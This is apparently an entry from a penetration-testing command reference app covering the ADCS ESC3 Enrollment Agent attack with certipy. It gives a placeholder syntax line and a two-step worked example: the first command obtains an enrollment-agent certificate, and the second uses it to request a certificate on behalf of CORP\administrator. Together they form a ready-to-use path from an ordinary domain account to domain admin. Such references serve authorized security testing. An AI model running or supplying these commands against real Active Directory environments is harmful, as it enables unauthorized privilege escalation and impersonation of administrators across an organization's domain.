Certipy ESC3 (Enrollment Agent)

ESC3: a template has the Certificate Request Agent EKU. Get an enrollment-agent cert, then use it to enroll on behalf of any user — typically a Domain Admin — against a template that allows enroll-on-behalf-of.

Tool
certipy
Category
Credential Attacks / ADCS (Certificate Abuse)
Platform
linux
Requires
password
Protocols
LDAP

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

certipy req -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -ca '<ca-name>' -template '<enrollment-agent-template>'

Examples

# Step 1: get enrollment agent cert
certipy req -u jdoe@corp.local -p Pass -dc-ip 10.10.10.10 -ca CORP-CA -template EnrollmentAgent
# Step 2: use it to request a cert as administrator
certipy req -u jdoe@corp.local -p Pass -dc-ip 10.10.10.10 -ca CORP-CA -template User -on-behalf-of 'CORP\administrator' -pfx jdoe.pfx

Tags

certipy adcs esc3 enrollment-agent

References